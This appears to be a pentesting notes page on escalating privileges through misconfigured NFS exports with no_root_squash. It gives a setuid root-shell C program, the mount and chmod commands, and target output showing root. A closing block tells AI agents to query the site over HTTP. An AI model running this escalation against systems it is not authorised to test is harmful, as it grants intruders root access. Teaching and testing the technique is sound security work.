# Exploiting NFS weak Permission Network File System (NFS) is a distributed file system protocol that allows clients to access files over a network as if they were local. However, improper configuration and weak permissions can lead to significant security vulnerabilities, allowing for potential privilege escalation. ## Understanding NFS * NFS allows remote users to access files stored on a server over a network. * Files can be exported from an NFS server and mounted on client machines, enabling shared access. ## Understanding `root_squash` and `no_root_squash` The `root_squash` option is used in NFS to prevent root users on client machines from having root privileges on the NFS server. When this option is enabled, any request made by the root user (UID 0) from a client is mapped to the `nobody` user (or another specified user) on the NFS server. This means that even if a root user on the client accesses the NFS share, they will not have elevated privileges, effectively restricting their access to what the `nobody` user can access. The `no_root_squash` option allows root users on client machines to retain their root privileges when accessing NFS shares. When this option is enabled, root users on the client can access files on the NFS server with full root privileges. This means they can read, write, and modify files as if they were the root user on the NFS server. ## Setting `no_root_squash` ``` dollarboysushil@kali $ nano /etc/exports ........... ........... /var/nfs/general *(rw,no_root_squash) ........... ........... ``` ## Listing all accessible mounts ```bash dollarboysushil@kali $ showmount -e {ip} ``` ## Attack scenario We will create a simple root owned binary which will execute /bin/bash ``` #include #include #include #include int main(void) { setuid(0); setgid(0); system("/bin/bash"); } ``` then compile this .c code as ``` dollarboysushil@kali: gcc exploit.c -o exploit ``` Now being the root of our attacking machine ``` root@kali:~$ sudo mount -t nfs {target_ip}:/tmp /mnt root@kali:~$ cp exploit /mnt root@kali:~$ chmod u+s /mnt/exploit ``` here we are mounting /tmp of target to /mnt of our machine, then we copied our exploit to /mnt\ then uisng chmod u+s we are setting up setuid in exploit. Now in target machine ``` user@target $: cd /tmp user@target:/tmp $: ./exploit root@target:/tmp #: id uid=0(root) gid=0(root) groups=0(root),4(adm) ``` We are now root. --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://notes.dollarboysushil.com/linux-privilege-escalation/exploiting-nfs-weak-permission.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.